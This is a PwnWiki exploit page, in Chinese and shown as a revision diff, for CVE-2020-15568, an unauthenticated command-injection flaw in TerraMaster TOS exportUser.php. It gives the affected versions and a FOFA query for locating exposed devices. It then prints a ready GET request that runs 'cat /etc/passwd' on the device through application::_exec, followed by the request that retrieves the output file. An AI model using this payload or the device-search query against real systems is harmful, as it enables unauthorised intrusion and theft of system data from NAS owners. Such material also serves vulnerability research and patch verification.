Difference between revisions of "CVE-2020-15568 TerraMaster TOS exportUser.php 遠程命令執行漏洞"
From PwnWiki
(Created page with "<languages /> <translate> ==漏洞影響== </translate> <pre> TerraMaster TOS < 4.1.24 </pre> ==FOFA== <pre> "TerraMaster" && header="TOS" </pre> <translate> ==漏洞利用=...") |
(Marked this version for translation) |
||
| Line 1: | Line 1: | ||
<languages /> | <languages /> | ||
<translate> | <translate> | ||
| − | ==漏洞影響== | + | ==漏洞影響== <!--T:1--> |
</translate> | </translate> | ||
<pre> | <pre> | ||
| Line 13: | Line 13: | ||
<translate> | <translate> | ||
| − | ==漏洞利用== | + | ==漏洞利用== <!--T:2--> |
</translate> | </translate> | ||
<translate> | <translate> | ||
| + | <!--T:3--> | ||
在其他文件的代碼檢查期間,也發現有一種方法可以利用TOS軟件中預先存在的類來利用此問題。位於<code>include/class/application.class.php</code>中的PHP類是在運行TOS軟件的設備上執行命令的最佳人選。 | 在其他文件的代碼檢查期間,也發現有一種方法可以利用TOS軟件中預先存在的類來利用此問題。位於<code>include/class/application.class.php</code>中的PHP類是在運行TOS軟件的設備上執行命令的最佳人選。 | ||
| + | <!--T:4--> | ||
由於exportUser.php沒有身份驗證控件,因此未經身份驗證的攻擊者有可能通過提供以下值作為HTTP GET參數來實現代碼執行。 | 由於exportUser.php沒有身份驗證控件,因此未經身份驗證的攻擊者有可能通過提供以下值作為HTTP GET參數來實現代碼執行。 | ||
</translate> | </translate> | ||
| Line 28: | Line 30: | ||
<translate> | <translate> | ||
| + | <!--T:5--> | ||
返回200後再次訪問 | 返回200後再次訪問 | ||
</translate> | </translate> | ||
| Line 36: | Line 39: | ||
<translate> | <translate> | ||
| − | ==參考== | + | ==參考== <!--T:6--> |
</translate> | </translate> | ||
https://short.pwnwiki.org/?c=0s3FRY | https://short.pwnwiki.org/?c=0s3FRY | ||
Latest revision as of 14:36, 9 June 2021
漏洞影響
TerraMaster TOS < 4.1.24
FOFA
"TerraMaster" && header="TOS"
漏洞利用
在其他文件的代碼檢查期間,也發現有一種方法可以利用TOS軟件中預先存在的類來利用此問題。位於include/class/application.class.php中的PHP類是在運行TOS軟件的設備上執行命令的最佳人選。
由於exportUser.php沒有身份驗證控件,因此未經身份驗證的攻擊者有可能通過提供以下值作為HTTP GET參數來實現代碼執行。
http://xxx.xxx.xxx.xxx/include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)>test.txt
返回200後再次訪問
http://xxx.xxx.xxx.xxx/include/test.txt